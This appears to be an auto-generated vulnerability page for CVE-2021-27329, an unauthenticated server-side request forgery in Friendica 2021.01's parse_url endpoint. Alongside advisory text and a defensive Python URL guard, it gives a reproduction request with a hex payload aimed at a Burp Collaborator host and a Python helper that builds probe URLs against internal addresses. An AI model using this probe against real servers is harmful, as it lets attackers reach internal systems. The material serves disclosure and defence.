CVE-2021-27329
Description
Friendica 2021.01 is vulnerable to server-side request forgery (SSRF) via the parse_url endpoint, allowing unauthenticated attackers to perform arbitrary DNS lookups and HTTP requests.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Vulnerability
Friendica version 2021.01 contains a server-side request forgery (SSRF) vulnerability in the parse_url endpoint. The binurl parameter accepts a hex-encoded URL and triggers a DNS lookup and HTTP request to the specified domain without any authentication or validation [1]. This allows an attacker to force the server to make requests to arbitrary external or internal hosts.
Exploitation
An unauthenticated attacker can send a GET request to /parse_url?binurl=<hex-encoded target>. The value shown in the report, 73767274703267776f7375713063623539706668336f69366a78706e64632e62757270636f6c6c61626f7261746f722e6e6574, decodes to svrtp2gwosuq0cb59pfh3oi6jxpndc.burpcollaborator.net, a Burp Collaborator domain; note that it is a bare hostname with no scheme [1]. The server performs a DNS lookup and an HTTP request to the decoded target, and the response includes an attachment link pointing to that URL [1]. No user interaction or special privileges are required.
Impact
Successful exploitation allows the attacker to use the Friendica server as a proxy to attack other systems, including internal services within the same network or public third-party systems [1]. This can lead to information disclosure, further compromise of internal resources, or use of the server in distributed attacks.
Mitigation
The available reference does not provide a specific fix or patched version [1]. Users should monitor the Friendica project for updates and consider restricting access to the parse_url endpoint or implementing input validation as a workaround until a patch is released.
AI Insight generated on May 27, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
- Friendica / Friendica
Patches
No patches discovered yet.
Vulnerability mechanics
Root cause
"Missing input validation on the `binurl` parameter in the `parse_url` endpoint allows arbitrary DNS lookups and HTTP requests."
Attack vector
An unauthenticated attacker sends a GET request to `/parse_url` with a `binurl` parameter containing a hex-encoded domain name (e.g., `73767274703267776f7375713063623539706668336f69366a78706e64632e62757270636f6c6c61626f7261746f722e6e6574`). The server decodes this value and performs a DNS lookup and HTTP request to the attacker-controlled domain, enabling server-side request forgery (SSRF) [ref_id=1]. No authentication is required to trigger the behavior [ref_id=1].
Affected code
The vulnerability exists in the `parse_url` endpoint of Friendica 2021.01. The `binurl` parameter is passed directly to functions that perform DNS lookups and HTTP requests without sufficient validation [ref_id=1].
What the fix does
No patch is included in the bundle. The advisory recommends implementing a whitelist of permitted services and hosts, and blocking any interactions that do not appear on this whitelist. Additionally, the advisory suggests blocking network access from the application server to other internal systems and hardening the application server itself [ref_id=1].
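The allowlist-and-block-internal approach described under Mitigation and What the fix does, as an added example written for this page rather than taken from Friendica: a Python guard that an application could run over the decoded binurl value before any DNS lookup or HTTP request is made. It allowlists schemes (and optionally hosts), resolves the name itself, refuses every answer that is private, loopback, link-local, multicast or reserved, and returns the vetted IP so the HTTP client connects to that address instead of resolving the name a second time. The resolver is injectable so the sample runs offline; FAKE_DNS, the host names in it and the IP 93.184.216.34 are constructed test data.

```python
"""Added example (not Friendica code): outbound-URL guard of the kind the advisory
recommends for the parse_url/binurl path."""
import ipaddress
import socket
from dataclasses import dataclass
from typing import Callable, Iterable, List, Optional
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}

# Constructed test data: a stand-in for DNS so the sample runs offline.
FAKE_DNS = {
    "friendica.example": ["93.184.216.34"],
    "intranet.local": ["10.0.0.5"],
    "rebind.example": ["93.184.216.34", "10.0.0.5"],  # mixed public/private answers
}

def fake_resolve(host: str) -> List[str]:
    return FAKE_DNS.get(host.lower(), [])

def system_resolve(host: str) -> List[str]:
    """Real resolver: every A/AAAA answer for host (no connection is opened)."""
    infos = socket.getaddrinfo(host, None, proto=socket.IPPROTO_TCP)
    return sorted({info[4][0] for info in infos})

class UnsafeUrl(ValueError):
    """Raised when a URL must not be fetched server-side."""

@dataclass(frozen=True)
class VettedTarget:
    scheme: str
    host: str   # name to put in the Host header / TLS SNI
    port: int
    ip: str     # address the client must actually connect to

def is_public_address(ip: str) -> bool:
    addr = ipaddress.ip_address(ip)
    # ::ffff:10.0.0.5 is judged by its embedded IPv4 address.
    if isinstance(addr, ipaddress.IPv6Address) and addr.ipv4_mapped is not None:
        addr = addr.ipv4_mapped
    return not (addr.is_private or addr.is_loopback or addr.is_link_local
                or addr.is_multicast or addr.is_reserved or addr.is_unspecified)

def vet_outbound_url(url: str, *, host_allowlist: Optional[Iterable[str]] = None,
                     resolve: Callable[[str], List[str]] = system_resolve) -> VettedTarget:
    parts = urlsplit(url)
    scheme = parts.scheme.lower()
    if scheme not in ALLOWED_SCHEMES:
        raise UnsafeUrl(f"scheme not allowed: {parts.scheme!r}")
    host = parts.hostname
    if not host:
        raise UnsafeUrl("URL has no host")  # a bare 'example.net' parses as a path
    if parts.username or parts.password:
        raise UnsafeUrl("credentials in URL are not allowed")
    try:
        port = parts.port or (443 if scheme == "https" else 80)
    except ValueError:
        raise UnsafeUrl("invalid port")
    if host_allowlist is not None and host.lower() not in {h.lower() for h in host_allowlist}:
        raise UnsafeUrl(f"host not on allowlist: {host}")
    try:
        addresses = [str(ipaddress.ip_address(host))]  # literal IP: check it directly
    except ValueError:
        addresses = resolve(host)                      # name: resolve exactly once, here
    if not addresses:
        raise UnsafeUrl(f"host does not resolve: {host}")
    bad = [ip for ip in addresses if not is_public_address(ip)]
    if bad:  # one non-public answer is enough to refuse (split-horizon / rebinding tricks)
        raise UnsafeUrl(f"{host} resolves to non-public address(es): {bad}")
    return VettedTarget(scheme, host, port, addresses[0])

def rejection_reason(url: str, **kwargs) -> Optional[str]:
    """None if the URL passes the guard, otherwise the reason it was refused."""
    try:
        vet_outbound_url(url, **kwargs)
        return None
    except UnsafeUrl as exc:
        return str(exc)

if __name__ == "__main__":
    for candidate in ["https://friendica.example/feed",
                      "svrtp2gwosuq0cb59pfh3oi6jxpndc.burpcollaborator.net",  # PoC form: bare host
                      "http://intranet.local/", "http://127.0.0.1:8080/",
                      "http://[::ffff:10.0.0.5]/"]:
        print(candidate, "->", rejection_reason(candidate, resolve=fake_resolve) or "allowed")
```

The caller must connect to VettedTarget.ip (sending VettedTarget.host as the Host header) and must not follow redirects without running the guard again on each hop; otherwise a public host can redirect the server onto the internal network after the check has passed.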
Preconditions
- auth: No authentication required; the endpoint is publicly accessible
- network: Attacker must be able to reach the Friendica instance over HTTP
- input: Attacker controls a domain that will receive the DNS lookup and HTTP request
Reproduction
Send the following request to a Friendica 2021.01 instance:
```
GET /parse_url?binurl=73767274703267776f7375713063623539706668336f69366a78706e64632e62757270636f6c6c61626f7261746f722e6e6574&_=1613263595343 HTTP/1.1
Host:
```
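As an added worked example for the Exploitation, Attack vector and Reproduction passages (not code from Friendica or from the GitHub issue), the following Python helper decodes the hex value quoted above, encodes an arbitrary target the same way, and builds the probe URL and the equivalent raw request. The instance name friendica.example and the internal target 10.0.0.5:8080 are hypothetical placeholders; nothing is sent on the network.

```python
"""Added worked example for CVE-2021-27329 (not Friendica code and not taken from the
GitHub issue): encode/decode the `binurl` parameter and build the probe request."""
from typing import Optional
from urllib.parse import urlencode

# Hex value quoted in the report; decoding it shows what the PoC made the server contact.
ADVISORY_HEX = (
    "73767274703267776f7375713063623539706668336f69366a78706e64632e"
    "62757270636f6c6c61626f7261746f722e6e6574"
)

def decode_binurl(hex_value: str) -> str:
    """Decode a binurl value back to the URL or host the server will look up and fetch."""
    return bytes.fromhex(hex_value).decode("utf-8")

def encode_binurl(target: str) -> str:
    """Hex-encode a target (full URL or bare host) the way the binurl parameter expects."""
    return target.encode("utf-8").hex()

def build_probe_url(base_url: str, target: str, cache_buster: Optional[int] = None) -> str:
    """Build the GET URL that makes the server resolve and fetch `target`.

    `base_url` is the Friendica instance (hypothetical in the examples below); the
    optional `_` parameter mirrors the cache-buster seen in the original request."""
    params = {"binurl": encode_binurl(target)}
    if cache_buster is not None:
        params["_"] = str(cache_buster)
    return f"{base_url.rstrip('/')}/parse_url?{urlencode(params)}"

def build_raw_request(host: str, target: str) -> str:
    """Render the same probe as a raw HTTP/1.1 request, e.g. for replay through a proxy."""
    path = build_probe_url("", target)
    return f"GET {path} HTTP/1.1\r\nHost: {host}\r\nConnection: close\r\n\r\n"

if __name__ == "__main__":
    print("advisory payload decodes to:", decode_binurl(ADVISORY_HEX))
    # Hypothetical instance and a hypothetical internal host reachable only from the server.
    print(build_probe_url("https://friendica.example", "http://10.0.0.5:8080/"))
    print(build_raw_request("friendica.example", decode_binurl(ADVISORY_HEX)))
```

Point the probe at a DNS name you control (as the report did with a Collaborator host) to confirm the lookup and fetch out of band; the attachment link in the response is the in-band confirmation.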
Generated on May 25, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
[1] github.com/friendica/friendica/issues/9929 (MITRE, x_refsource_MISC)
News mentions
No linked articles in our index yet.